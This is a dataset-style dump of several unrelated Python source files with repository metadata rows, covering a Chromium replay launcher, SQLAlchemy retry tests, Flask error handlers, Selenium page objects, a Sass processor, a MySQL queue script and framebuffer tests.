retval = subprocess.call(chromium_args)
finally:
shutil.rmtree(user_data_dir)
def main():
log_level = logging.DEBUG
logging.basicConfig(level=log_level,
format='%(asctime)s %(filename)s:%(lineno)-3d'
' %(levelname)s %(message)s',
datefmt='%y%m%d %H:%M:%S')
option_parser = optparse.OptionParser(usage=USAGE)
option_parser.add_option(
'', '--auto', action='store_true', default=False,
help='Start test automatically.')
option_parser.add_option(
'', '--replay-dir', default=None,
help='Run replay from this directory instead of tools/build/third_party.')
replay_group = optparse.OptionGroup(option_parser,
'Options for replay.py', 'These options are passed through to replay.py.')
replay_group.add_option(
'', '--record', action='store_true', default=False,
help='Record a new WPR archive.')
replay_group.add_option( # use default that does not require sudo
'', '--dns_forwarding', default=False, action='store_true',
help='Forward DNS requests to the local replay server.')
option_parser.add_option_group(replay_group)
options, args = option_parser.parse_args()
if len(args) != 2:
option_parser.error('Need CHROME_EXE and TEST_NAME.')
return 1
chrome_exe, test_name = args
if not os.path.exists(chrome_exe):
print >>sys.stderr, 'Chrome path does not exist:', chrome_exe
return 1
chromium_paths = ChromiumPaths(
TEST_NAME=test_name,
TEST_EXE_NAME='webpagereplay_utils')
if os.path.exists(chromium_paths['archives']):
archive_path = chromium_paths['.wpr']
else:
archive_path = chromium_paths['.wpr_alt']
if not os.path.exists(archive_path) and not options.record:
print >>sys.stderr, 'Archive does not exist:', archive_path
return 1
replay_options = []
if options.record:
replay_options.append('--record')
if not options.dns_forwarding:
replay_options.append('--no-dns_forwarding')
if options.replay_dir:
replay_dir = options.replay_dir
else:
replay_dir = chromium_paths['replay']
wpr = ReplayLauncher(replay_dir, archive_path,
chromium_paths['logs'], replay_options)
try:
wpr.StartServer()
LaunchChromium(chrome_exe, chromium_paths, test_name,
options.dns_forwarding, options.auto)
finally:
wpr.StopServer()
return 0
if '__main__' == __name__:
sys.exit(main())
| 33.462963
| 80
| 0.672385
|
a1cbc0ab88172b8df0037e5e1d507404e620e551
| 178
|
py
|
Python
|
0x04-python-more_data_structures/3-common_elements.py
|
calypsobronte/holbertonschool-higher_level_programming
|
c39c060d8473976fa475d22fffba5cb4329c9965
|
[
"MIT"
] | null | null | null |
0x04-python-more_data_structures/3-common_elements.py
|
calypsobronte/holbertonschool-higher_level_programming
|
c39c060d8473976fa475d22fffba5cb4329c9965
|
[
"MIT"
] | null | null | null |
0x04-python-more_data_structures/3-common_elements.py
|
calypsobronte/holbertonschool-higher_level_programming
|
c39c060d8473976fa475d22fffba5cb4329c9965
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
def common_elements(set_1, set_2):
result = []
for element in set_1:
if element in set_2:
result.append(element)
return result
| 22.25
| 34
| 0.623596
|
d26e80d87b36f85e32156689eb46739d78d42199
| 7,339
|
py
|
Python
|
websauna/tests/test_retry.py
|
maikroeder/websauna
|
fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa
|
[
"CNRI-Python"
] | null | null | null |
websauna/tests/test_retry.py
|
maikroeder/websauna
|
fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa
|
[
"CNRI-Python"
] | null | null | null |
websauna/tests/test_retry.py
|
maikroeder/websauna
|
fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa
|
[
"CNRI-Python"
] | 1
|
2021-04-15T17:35:57.000Z
|
2021-04-15T17:35:57.000Z
|
"""Test SQL transaction conflict resolution."""
import threading
import time
import pytest
from sqlalchemy import Column
from sqlalchemy import Numeric
from sqlalchemy import Integer
import transaction
from websauna.system.model.meta import create_dbsession, Base
from websauna.system.model.retry import retryable, CannotRetryAnymore, is_retryable
_test_model = None
def get_test_model():
global _test_model
if _test_model:
return _test_model
class TestModel(Base):
"""A sample SQLAlchemy model to demostrate db conflicts. """
__tablename__ = "test_model"
#: Running counter used in foreign key references
id = Column(Integer, primary_key=True)
#: The total balance of this wallet in the minimum unit of cryptocurrency
#: NOTE: accuracy checked for Bitcoin only
balance = Column(Numeric(21, 8))
_test_model = TestModel
return _test_model
class ConflictThread(threading.Thread):
"""Launch two of these and they should cause database conflict."""
def __init__(self, session_factory):
self.session_factory = session_factory
self.failure = None
threading.Thread.__init__(self)
def run(self):
txn = None
try:
dbsession = self.session_factory()
txn = dbsession.transaction_manager.begin()
TestModel = get_test_model()
# Both threads modify the same wallet simultaneously
w = dbsession.query(TestModel).get(1)
w.balance += 1
# Let the other session to start its own transaction
time.sleep(1)
dbsession.transaction_manager.commit()
except Exception as e:
self.failure = (txn, dbsession, e)
class ConflictResolverThread(threading.Thread):
"""Launch two of these and they should cause database conflict and then retryable resolves it."""
def __init__(self, dbsession_factory):
self.dbsession_factory = dbsession_factory
self.failure = None
threading.Thread.__init__(self)
self.success_count = 0
self.failure_count = 0
self.retry_count = 0
def run(self):
dbsession = self.dbsession_factory()
# Execute the conflict sensitive code inside a managed transaction
@retryable(tm=dbsession.transaction_manager)
def myfunc():
TestModel = get_test_model()
# Both threads modify the same wallet simultaneously
w = dbsession.query(TestModel).get(1)
w.balance += 1
# Let the other session to start its own transaction
time.sleep(1)
try:
myfunc()
self.success_count += 1
except Exception as e:
self.failure = e
self.failure_count += 1
# See retryable()
self.retry_count = dbsession.transaction_manager.latest_retry_count
@pytest.fixture
def test_instance(dbsession):
TestModel = get_test_model()
Base.metadata.create_all(tables=[TestModel.__table__], bind=dbsession.get_bind())
with dbsession.transaction_manager:
# Create an wallet with balance of 10
w = dbsession.query(TestModel).get(1)
if not w:
w = TestModel()
dbsession.add(w)
w.balance = 10
@pytest.fixture
def dbsession_factory(test_request):
def factory():
dbsession = create_dbsession(test_request.registry, manager=None)
# Retry each transaction max 1 times
dbsession.transaction_manager.retry_attempt_count = 2
return dbsession
return factory
def test_sql_transaction_conflict(test_instance, dbsession_factory):
"""Run database to a transaction conflict and see what exception it spits out, and make sure we know this is the exception we expect."""
t1 = ConflictThread(dbsession_factory)
t2 = ConflictThread(dbsession_factory)
t1.start()
t2.start()
t1.join()
t2.join()
# Either thread spits out:
# sqlalchemy.exc.OperationalError: (TransactionRollbackError) could not serialize access due to concurrent update
# 'UPDATE btc_wallet SET updated_at=%(updated_at)s, balance=%(balance)s WHERE btc_wallet.id = %(btc_wallet_id)s' {'btc_wallet_id': 1, 'balance': Decimal('11.00000000'), 'updated_at': datetime.datetime(2014, 12, 18, 1, 53, 58, 583219)}
failure = t1.failure or t2.failure or None
assert failure is not None
txn, dbsession, exc = failure
error_type = exc.__class__
error = exc
assert txn.status == "Commit failed"
assert is_retryable(txn, error) is True
def test_conflict_resolved(test_instance, dbsession_factory, dbsession):
"""Use conflict resolver to resolve conflict between two transactions and see code retry is correctly run."""
TestModel = get_test_model()
t1 = ConflictResolverThread(dbsession_factory)
t2 = ConflictResolverThread(dbsession_factory)
t1.start()
t2.start()
t1.join()
t2.join()
# sqlalchemy.exc.OperationalError: (TransactionRollbackError) could not serialize access due to concurrent update
# 'UPDATE btc_wallet SET updated_at=%(updated_at)s, balance=%(balance)s WHERE btc_wallet.id = %(btc_wallet_id)s' {'btc_wallet_id': 1, 'balance': Decimal('11.00000000'), 'updated_at': datetime.datetime(2014, 12, 18, 1, 53, 58, 583219)}
failure = t1.failure or t2.failure or None
assert failure is None # Both threads pass
# Check both increments came through
with transaction.manager:
w = dbsession.query(TestModel).get(1)
assert w.balance == 12
success = sum([t1.success_count, t2.success_count])
retries = sum([t1.retry_count, t2.retry_count])
errors = sum([t1.failure_count, t2.failure_count])
assert success == 2
assert retries == 1 # At least one thread needs to retry
assert errors == 0
def test_conflict_some_other_exception(dbsession):
"""See that unknown exceptions are correctly reraised by managed_transaction."""
@retryable(tm=dbsession.transaction_manager)
def do_stuff():
raise ValueError("Unknown exception")
with pytest.raises(ValueError):
do_stuff()
def test_give_up(test_instance, dbsession_factory, dbsession):
"""See that the conflict resolver gives up after using given number of attempts to replay transactions."""
# The resolved has retry count of 1,
# First t1 success, t2 and t3 clases
# Then t2 success, t3 retries but is out of
t1 = ConflictResolverThread(dbsession_factory)
t2 = ConflictResolverThread(dbsession_factory)
t3 = ConflictResolverThread(dbsession_factory)
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
failure = t1.failure or t2.failure or t3.failure or None
assert isinstance(failure, CannotRetryAnymore)
success = sum([t1.success_count, t2.success_count, t3.success_count])
retries = sum([t1.retry_count, t2.retry_count, t3.retry_count])
errors = sum([t1.failure_count, t2.failure_count, t3.failure_count])
assert success == 2
assert retries == 2
assert errors == 1
# Check 2 increments came through
TestModel = get_test_model()
with transaction.manager:
w = dbsession.query(TestModel).get(1)
assert w.balance == 12
| 30.077869
| 239
| 0.682518
|
2373eb11c6668613c49c0919415f654f42a85861
| 1,807
|
py
|
Python
|
website/handlers.py
|
megaraph/johnian-network
|
1289323d17444d56efa3c92cbe49f9b2df010e9f
|
[
"MIT"
] | 1
|
2021-12-15T09:39:57.000Z
|
2021-12-15T09:39:57.000Z
|
website/handlers.py
|
megaraph/johnian-network
|
1289323d17444d56efa3c92cbe49f9b2df010e9f
|
[
"MIT"
] | null | null | null |
website/handlers.py
|
megaraph/johnian-network
|
1289323d17444d56efa3c92cbe49f9b2df010e9f
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, render_template
errors = Blueprint('errors', __name__)
@errors.app_errorhandler(404)
def error_404(error):
error_popper = "Oh no!"
error_code = "404"
error_img = error_code
error_message = "Deadend! Comeback to the homepage and continue where you left off"
return render_template(
'error_page.html',
error_popper=error_popper,
error_code=error_code,
error_img=error_img,
error_message=error_message
), 404
@errors.app_errorhandler(403)
def error_403(error):
error_popper = "Forbidden!"
error_code = "403"
error_img = error_code
error_message = "You stumbled across something you weren’t meant to access. Comeback to the homepage"
return render_template(
'error_page.html',
error_popper=error_popper,
error_code=error_code,
error_img=error_img,
error_message=error_message
), 403
@errors.app_errorhandler(405)
def error_405(error):
error_popper = "Woops!"
error_code = "405"
error_img = "403"
error_message = "You stumbled across something you weren’t meant to access. Comeback to the homepage"
return render_template(
'error_page.html',
error_popper=error_popper,
error_code=error_code,
error_img=error_img,
error_message=error_message
), 405
@errors.app_errorhandler(500)
def error_500(error):
error_popper = "Woops!"
error_code = "500"
error_img = error_code
error_message = "There’s a bug in the system! Comeback to the homepage to continue where you left off"
return render_template(
'error_page.html',
error_popper=error_popper,
error_code=error_code,
error_img=error_img,
error_message=error_message
), 500
| 28.234375
| 106
| 0.68788
|
6a1f5c2d5983f7f1850f316333009599ea607db8
| 2,026
|
py
|
Python
|
pages/base_page.py
|
veffhz/selenium_page_object
|
237f8a31a118aaeeba8379bad219266d75edf635
|
[
"MIT"
] | null | null | null |
pages/base_page.py
|
veffhz/selenium_page_object
|
237f8a31a118aaeeba8379bad219266d75edf635
|
[
"MIT"
] | null | null | null |
pages/base_page.py
|
veffhz/selenium_page_object
|
237f8a31a118aaeeba8379bad219266d75edf635
|
[
"MIT"
] | null | null | null |
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.support.wait import WebDriverWait
from .locators import BasePageLocators
class BasePage:
def __init__(self, browser, url, timeout=10):
self.browser = browser
self.url = url
self.browser.implicitly_wait(timeout)
def go_to_login_page(self):
link = self.browser.find_element(*BasePageLocators.LOGIN_LINK)
link.click()
def go_to_cart_page(self):
link = self.browser.find_element(*BasePageLocators.VIEW_CART_LINK)
link.click()
def should_be_login_link(self):
assert self.is_element_present(*BasePageLocators.LOGIN_LINK), \
"Login link is not presented"
def should_be_cart_link(self):
assert self.is_element_present(*BasePageLocators.VIEW_CART_LINK), \
"Cart link is not presented"
def should_be_authorized_user(self):
assert self.is_element_present(*BasePageLocators.USER_ICON), \
"User icon is not presented," " probably unauthorised user"
def open(self):
self.browser.get(self.url)
def find(self, how, what):
return self.browser.find_element(how, what)
def is_element_present(self, how, what):
try:
self.browser.find_element(how, what)
except NoSuchElementException:
return False
return True
def is_not_element_present(self, how, what, timeout=4):
try:
WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))
except TimeoutException:
return True
return False
def is_disappeared(self, how, what, timeout=4):
try:
WebDriverWait(self.browser, timeout, 1, TimeoutException). \
until_not(EC.presence_of_element_located((how, what)))
except TimeoutException:
return False
return True
| 32.677419
| 99
| 0.67769
|
aa3a991d02defe69c352599f893a22c0c4e7afc5
| 1,341
|
py
|
Python
|
thumt/modules/embedding.py
|
Yuran-Zhao/THUMT
|
10f0433c1f2fe3f992d26ccb6f4f8dec457ce695
|
[
"BSD-3-Clause"
] | 422
|
2018-12-03T19:47:06.000Z
|
2022-03-29T13:18:09.000Z
|
thumt/modules/embedding.py
|
Yuran-Zhao/THUMT
|
10f0433c1f2fe3f992d26ccb6f4f8dec457ce695
|
[
"BSD-3-Clause"
] | 60
|
2019-02-11T02:43:52.000Z
|
2022-02-20T07:24:40.000Z
|
thumt/modules/embedding.py
|
Yuran-Zhao/THUMT
|
10f0433c1f2fe3f992d26ccb6f4f8dec457ce695
|
[
"BSD-3-Clause"
] | 121
|
2018-12-29T03:40:40.000Z
|
2022-03-03T11:33:23.000Z
|
# coding=utf-8
# Copyright 2017-2020 The THUMT Authors
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import torch
class PositionalEmbedding(torch.nn.Module):
def __init__(self):
super(PositionalEmbedding, self).__init__()
def forward(self, inputs):
if inputs.dim() != 3:
raise ValueError("The rank of input must be 3.")
length = inputs.shape[1]
channels = inputs.shape[2]
half_dim = channels // 2
positions = torch.arange(length, dtype=inputs.dtype,
device=inputs.device)
dimensions = torch.arange(half_dim, dtype=inputs.dtype,
device=inputs.device)
scale = math.log(10000.0) / float(half_dim - 1)
dimensions.mul_(-scale).exp_()
scaled_time = positions.unsqueeze(1) * dimensions.unsqueeze(0)
signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)],
dim=1)
if channels % 2 == 1:
pad = torch.zeros([signal.shape[0], 1], dtype=inputs.dtype,
device=inputs.device)
signal = torch.cat([signal, pad], axis=1)
return inputs + torch.reshape(signal, [1, -1, channels]).to(inputs)
| 31.186047
| 76
| 0.598807
|
cfb9bd2c8b4bb5c927f86f28d9d5a2588fb52139
| 92
|
py
|
Python
|
cripts/core/user_migrate.py
|
lakiw/cripts
|
43f62891a3724e1ec60629887d97c421fb302163
|
[
"MIT"
] | 2
|
2017-04-06T12:26:11.000Z
|
2018-11-05T19:17:15.000Z
|
cripts/core/user_migrate.py
|
lakiw/cripts
|
43f62891a3724e1ec60629887d97c421fb302163
|
[
"MIT"
] | 9
|
2016-09-28T10:19:10.000Z
|
2017-02-24T17:58:43.000Z
|
cripts/core/user_migrate.py
|
lakiw/cripts
|
43f62891a3724e1ec60629887d97c421fb302163
|
[
"MIT"
] | null | null | null |
def migrate_user(self):
"""
Migrate to latest schema version.
"""
return
| 10.222222
| 37
| 0.576087
|
6dd9254a4fa6c53a449d5ab827e96ed56bdaeda8
| 5,112
|
py
|
Python
|
piecrust/processing/sass.py
|
ludovicchabant/PieCrust2
|
89b2bf268bfdaae24ff6cf6d8c29c0b1239be739
|
[
"Apache-2.0"
] | 43
|
2015-04-24T05:30:04.000Z
|
2022-02-03T17:47:35.000Z
|
piecrust/processing/sass.py
|
ludovicchabant/PieCrust2
|
89b2bf268bfdaae24ff6cf6d8c29c0b1239be739
|
[
"Apache-2.0"
] | 54
|
2015-01-03T01:58:44.000Z
|
2021-05-06T21:56:26.000Z
|
piecrust/processing/sass.py
|
ludovicchabant/PieCrust2
|
89b2bf268bfdaae24ff6cf6d8c29c0b1239be739
|
[
"Apache-2.0"
] | 8
|
2015-05-10T01:50:46.000Z
|
2016-12-26T20:53:15.000Z
|
import os
import os.path
import json
import hashlib
import logging
import platform
import subprocess
from piecrust.processing.base import SimpleFileProcessor, FORCE_BUILD
logger = logging.getLogger(__name__)
class SassProcessor(SimpleFileProcessor):
PROCESSOR_NAME = 'sass'
def __init__(self):
super(SassProcessor, self).__init__(
extensions={'scss': 'css', 'sass': 'css'})
self._conf = None
self._map_dir = None
def initialize(self, app):
super(SassProcessor, self).initialize(app)
def onPipelineStart(self, ctx):
super(SassProcessor, self).onPipelineStart(ctx)
self._map_dir = os.path.join(ctx.tmp_dir, 'sass')
if ctx.is_main_process:
if not os.path.isdir(self._map_dir):
os.makedirs(self._map_dir)
# Ignore include-only Sass files.
ctx.ignore_patterns += ['_*.scss', '_*.sass']
def getDependencies(self, path):
if _is_include_only(path):
raise Exception("Include only Sass files should be ignored!")
map_path = self._getMapPath(path)
try:
with open(map_path, 'r') as f:
dep_map = json.load(f)
except IOError:
# Map file not found... rebuild.
logger.debug("No map file found for Sass file '%s' at '%s'. "
"Rebuilding." % (path, map_path))
return FORCE_BUILD
if dep_map.get('version') != 3:
logger.warning("Unknown Sass map version. Rebuilding.")
return FORCE_BUILD
sources = dep_map.get('sources', [])
deps = list(map(_clean_scheme, sources))
return deps
def _doProcess(self, in_path, out_path):
self._ensureInitialized()
if _is_include_only(in_path):
raise Exception("Include only Sass files should be ignored!")
sourcemap = 'none'
if self.app.cache.enabled:
sourcemap = 'file'
args = [self._conf['bin'],
'--sourcemap=%s' % sourcemap,
'--style', self._conf['style']]
cache_dir = self._conf['cache_dir']
if cache_dir:
args += ['--cache-location', cache_dir]
else:
args += ['--no-cache']
for lp in self._conf['load_paths']:
args += ['-I', lp]
args += self._conf['options']
args += [in_path, out_path]
logger.debug("Processing Sass file: %s" % args)
try:
retcode = subprocess.call(args)
except FileNotFoundError as ex:
logger.error("Tried running Sass processor with command: %s" %
args)
raise Exception("Error running Sass processor. "
"Did you install it?") from ex
# The sourcemap is generated next to the CSS file... there doesn't
# seem to be any option to override that, sadly... so we need to move
# it to the cache directory.
if self.app.cache.enabled:
src_map_file = out_path + '.map'
dst_map_file = self._getMapPath(in_path)
if os.path.exists(dst_map_file):
os.remove(dst_map_file)
os.rename(src_map_file, dst_map_file)
if retcode != 0:
raise Exception("Error occured in Sass compiler. Please check "
"log messages above for more information.")
return True
def _ensureInitialized(self):
if self._conf is not None:
return
bin_name = 'scss'
if platform.system() == 'Windows':
bin_name += '.cmd'
self._conf = self.app.config.get('sass') or {}
self._conf.setdefault('bin', bin_name)
self._conf.setdefault('style', 'nested')
self._conf.setdefault('load_paths', [])
if not isinstance(self._conf['load_paths'], list):
raise Exception("The `sass/load_paths` configuration setting "
"must be an array of paths.")
self._conf.setdefault('options', [])
if not isinstance(self._conf['options'], list):
raise Exception("The `sass/options` configuration setting "
"must be an array of arguments.")
app_root_dir = self.app.root_dir
load_paths = list(self._conf['load_paths'])
for i, lp in enumerate(load_paths):
self._conf['load_paths'][i] = os.path.join(app_root_dir, lp)
cache_dir = None
if self.app.cache.enabled:
cache_dir = os.path.join(self.app.cache_dir, 'sass')
self._conf.setdefault('cache_dir', cache_dir)
def _getMapPath(self, path):
map_name = "%s_%s.map" % (
os.path.basename(path),
hashlib.md5(path.encode('utf8')).hexdigest())
map_path = os.path.join(self._map_dir, map_name)
return map_path
def _clean_scheme(p):
if p.startswith('file://'):
return p[7:]
return p
def _is_include_only(path):
name = os.path.basename(path)
return len(name) > 0 and name[0] == '_'
| 32.35443
| 77
| 0.57766
|
fe0e009199fba49fbbacf67cd7fa2d6503af0dfa
| 3,461
|
py
|
Python
|
Python/dhproc dev/p_cmd_in.py
|
theflorianmaas/dh
|
5e774ff084590cde146fad4cc677b8af001c956f
|
[
"MIT"
] | null | null | null |
Python/dhproc dev/p_cmd_in.py
|
theflorianmaas/dh
|
5e774ff084590cde146fad4cc677b8af001c956f
|
[
"MIT"
] | null | null | null |
Python/dhproc dev/p_cmd_in.py
|
theflorianmaas/dh
|
5e774ff084590cde146fad4cc677b8af001c956f
|
[
"MIT"
] | 1
|
2018-12-02T19:44:14.000Z
|
2018-12-02T19:44:14.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Ver 18 - 15 November 2017 -
import time
import string
import sys
import mysql.connector
from mysql.connector import errorcode, pooling
from db import *
import datetime
#from threading import Thread
import multiprocessing as mp
from multiprocessing import Queue
from multiprocessing.managers import SyncManager
HOST = ''
PORT0 = 5011
PORT1 = 5012
PORT2 = 5013
PORT3 = 5014
PORT4 = 5015
PORT5 = 5016
AUTHKEY = str("123456").encode("utf-8")
def output(o, x):
print(str(str(o) + " " + str(datetime.datetime.now().time())[:8]) + " "+ str(x))
sys.stdout.flush()
def printDBError(x, e):
output(x, "Error: " + str(e)) # errno, sqlstate, msg values
# -- DB Connection ---------------------------
try:
db = mysql.connector.connect(**config)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
output("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
output("Database does not exists")
else:
output(err)
else:
output("P_CMD_IN","Start procedure")
db.commit()
# -- END DB Connection ---------------------------
#-----------------------------
# Global Variable declaration
#-----------------------------
#-----------------------------
# End Global Variable declaration
#-----------------------------
#-- function to extract integer from strings
def parseint(string):
return int(''.join([x for x in string if x.isdigit()]))
def log(t, m):
#curLog = db.cursor()
sql = "insert into tblog (type,msg) VALUES (%s, %s)"
#try:
#curLog.execute(sql, (t,m))
#db.commit()
#curLog.close()
#except:
#raise
#curLog.close()
def printTime():
now = datetime.datetime.now()
print(now.strftime("%H %M %S %f"))
def execSQL(qSQL):
cur = db.cursor()
while True:
#try:
if not qSQL.empty():
sql = str(qSQL.get())
if sql[:1] == "0":
sql = sql[1:]
inssql = "UPDATE tbqueue SET timekey = millis(), code = '" + sql + "' WHERE id = 1"
else: # = 9
sql = sql[1:]
print("comando")
inssql = "INSERT INTO tbqueuecommand (timekey, code) VALUES (millis(), '" + sql + "')"
try:
db.start_transaction(False, None, False)
cur.execute(inssql)
db.commit()
except mysql.connector.Error as e:
printDBError("P_CMD_IN", e)
time.sleep(0.2)
def QueueServerClient(HOST, PORT, AUTHKEY):
class QueueManager(SyncManager):
pass
QueueManager.register('get_queue')
QueueManager.register('get_name')
QueueManager.register('get_description')
manager = QueueManager(address = (HOST, PORT), authkey = AUTHKEY)
manager.connect() # This starts the connected client
return manager
#------- Main section ----------------------------#
#------- Run once --------------------------------#
# create three connected managers
qmIn = QueueServerClient(HOST, PORT0, AUTHKEY)
qmOut = QueueServerClient(HOST, PORT1, AUTHKEY)
qmSql = QueueServerClient(HOST, PORT2, AUTHKEY)
qmResp = QueueServerClient(HOST, PORT3, AUTHKEY)
qmQry = QueueServerClient(HOST, PORT4, AUTHKEY)
qmRslt = QueueServerClient(HOST, PORT5, AUTHKEY)
# Get the queue objects from the clients
qIn = qmIn.get_queue()
qOut = qmOut.get_queue()
qSql = qmSql.get_queue()
qResp = qmResp.get_queue()
qQuery = qmQry.get_queue()
qResult = qmRslt.get_queue()
#------- End run once -------------------------#
log("I", "Start main loop")
execSQL(qSql)
| 25.448529
| 90
| 0.619474
|
6a4c60767ce8a0f55eb115ac93df45d0238e8308
| 79
|
py
|
Python
|
0x00-python-hello_world/102-magic_calculation.py
|
darkares23/holbertonschool-higher_level_programming
|
931b1b701d8a1d990b7cd931486496c0b5502e21
|
[
"MIT"
] | null | null | null |
0x00-python-hello_world/102-magic_calculation.py
|
darkares23/holbertonschool-higher_level_programming
|
931b1b701d8a1d990b7cd931486496c0b5502e21
|
[
"MIT"
] | null | null | null |
0x00-python-hello_world/102-magic_calculation.py
|
darkares23/holbertonschool-higher_level_programming
|
931b1b701d8a1d990b7cd931486496c0b5502e21
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
def magic_calculation(a, b):
return (98 + a ** b)
| 13.166667
| 28
| 0.56962
|
97bb9a66440da241618b67d89d2a9195af6ebf52
| 1,134
|
py
|
Python
|
transformers/_old/xom-topics.py
|
winnieepm/aanalte
|
6f1e8e34cf84b2176e4c1bce91668502f6c016e0
|
[
"MIT"
] | null | null | null |
transformers/_old/xom-topics.py
|
winnieepm/aanalte
|
6f1e8e34cf84b2176e4c1bce91668502f6c016e0
|
[
"MIT"
] | 7
|
2021-07-23T14:08:32.000Z
|
2021-07-25T14:56:35.000Z
|
transformers/_old/xom-topics.py
|
winnieepm/aanalte
|
6f1e8e34cf84b2176e4c1bce91668502f6c016e0
|
[
"MIT"
] | 1
|
2022-02-04T21:36:34.000Z
|
2022-02-04T21:36:34.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Extracts distinct referenced topics from text and returns a CSV.
"""
import re
import pandas as pd
# Create xom-topics.csv
cmd = "xsltproc xom-topics.xsl xom-all-flat-mod-pnums.xml > xom-topics.csv"
import os
os.system(cmd)
bigline = ''
with open('xom-topics.csv', 'r') as xom:
bigline = ' '.join([line.strip() for line in xom.readlines()])
bigline = re.sub(r'\s+', ' ', bigline)
#bigline = re.sub(r'\s*-\s*', '', bigline)
data = []
for line in bigline.split(';'):
data.append(line.split('|'))
df = pd.DataFrame(data, columns=['count', 'text_seg', 'topic_name'])
df['text_seg'] = df.text_seg.str.replace(' –', '')
df['text_seg'] = df.text_seg.str.strip()
df = df.sort_values(['topic_name','text_seg'])
df[['topic_name', 'text_seg', 'count']].to_csv('xom-topic-index.csv', sep='|', index=False)
df2 = df.groupby(['topic_name', 'text_seg']).count()
df2.to_csv('xom-topic-dict.csv', sep='|', index=True)
df3 = pd.DataFrame(df.topic_name.unique(), columns=['topic_name'])
df3.index.name = 'topic_id'
df3.to_csv('xom-topic-names.csv', sep='|', index=True)
| 29.842105
| 91
| 0.646384
|
3321520fd39d64663cd400cb5a8cbae3fc043a58
| 4,045
|
py
|
Python
|
tests/test_linux_framebuffer_device.py
|
AlessioMorale/luma.core
|
0b33e512a4ef8c7ae91ccd019bbe9fec0fbdcac6
|
[
"MIT"
] | 114
|
2017-01-13T16:06:46.000Z
|
2022-03-23T23:51:45.000Z
|
tests/test_linux_framebuffer_device.py
|
AlessioMorale/luma.core
|
0b33e512a4ef8c7ae91ccd019bbe9fec0fbdcac6
|
[
"MIT"
] | 192
|
2017-01-12T18:00:00.000Z
|
2022-02-20T22:38:31.000Z
|
tests/test_linux_framebuffer_device.py
|
AlessioMorale/luma.core
|
0b33e512a4ef8c7ae91ccd019bbe9fec0fbdcac6
|
[
"MIT"
] | 58
|
2017-01-21T13:54:03.000Z
|
2022-03-06T15:48:27.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 Richard Hull and contributors
# See LICENSE.rst for details.
"""
Tests for the :py:class:`luma.core.device.framebuffer` class.
"""
import os
import pytest
from luma.core.render import canvas
from luma.core.framebuffer import full_frame
from luma.core.device import linux_framebuffer
import luma.core.error
from helpers import multi_mock_open, get_reference_file
from unittest.mock import patch, call
WIDTH = 124
HEIGHT = 55
SCREEN_RES = f"{WIDTH},{HEIGHT}"
BITS_PER_PIXEL = "24"
def swap_red_and_blue(data, step):
arr = bytearray(data)
for i in range(0, len(arr), step):
[red, green, blue] = arr[i: i + 3]
arr[i: i + 3] = [blue, green, red]
return bytes(arr)
def test_display_id_as_dev_fb_number():
with patch("builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)):
device = linux_framebuffer("/dev/fb9")
assert device.id == 9
def test_display_id_from_environ():
os.environ["FRAMEBUFFER"] = "/dev/fb16"
with patch("builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)):
device = linux_framebuffer()
assert device.id == 16
def test_unknown_display_id():
with patch("builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)):
with pytest.raises(luma.core.error.DeviceNotFoundError):
linux_framebuffer("invalid fb")
def test_read_screen_resolution():
with patch(
"builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)
) as fake_open:
device = linux_framebuffer("/dev/fb1")
assert device.width == 124
assert device.height == 55
fake_open.assert_has_calls([call("/sys/class/graphics/fb1/virtual_size", "r")])
def test_read_bits_per_pixel():
with patch(
"builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)
) as fake_open:
device = linux_framebuffer("/dev/fb1")
assert device.bits_per_pixel == 24
fake_open.assert_has_calls(
[call("/sys/class/graphics/fb1/bits_per_pixel", "r")]
)
@pytest.mark.parametrize("bits_per_pixel,bgr", [
(16, False),
(24, False),
(24, True),
(32, False),
(32, True),
])
def test_display(bits_per_pixel, bgr):
bytes_per_pixel = bits_per_pixel // 8
with open(get_reference_file(f"fb_{bits_per_pixel}bpp.raw"), "rb") as fp:
reference = fp.read()
if bgr:
reference = swap_red_and_blue(reference, step=bytes_per_pixel)
with patch("builtins.open", multi_mock_open(SCREEN_RES, str(bits_per_pixel), None)) as fake_open:
device = linux_framebuffer("/dev/fb1", framebuffer=full_frame(), bgr=bgr)
fake_open.assert_has_calls([call("/dev/fb1", "wb")])
fake_open.reset_mock()
with canvas(device, dither=True) as draw:
draw.rectangle((0, 0, 64, 32), fill="red")
draw.rectangle((64, 0, 128, 32), fill="yellow")
draw.rectangle((0, 32, 64, 64), fill="orange")
draw.rectangle((64, 32, 128, 64), fill="white")
fake_open.return_value.seek.assert_has_calls([
call(n * WIDTH * bytes_per_pixel)
for n in range(HEIGHT)
])
fake_open.return_value.write.assert_has_calls([
call(reference[n:n + (WIDTH * bytes_per_pixel)])
for n in range(0, len(reference), WIDTH * bytes_per_pixel)
])
fake_open.return_value.flush.assert_called_once()
def test_unsupported_bit_depth():
with patch("builtins.open", multi_mock_open(SCREEN_RES, "19", None)):
with pytest.raises(AssertionError) as ex:
linux_framebuffer("/dev/fb4")
assert str(ex.value) == 'Unsupported bit-depth: 19'
def test_cleanup():
with patch("builtins.open", multi_mock_open(SCREEN_RES, BITS_PER_PIXEL, None)) as fake_open:
device = linux_framebuffer("/dev/fb1", framebuffer=full_frame())
device.cleanup()
fake_open.return_value.close.assert_called_once()
| 32.886179
| 101
| 0.663535
|
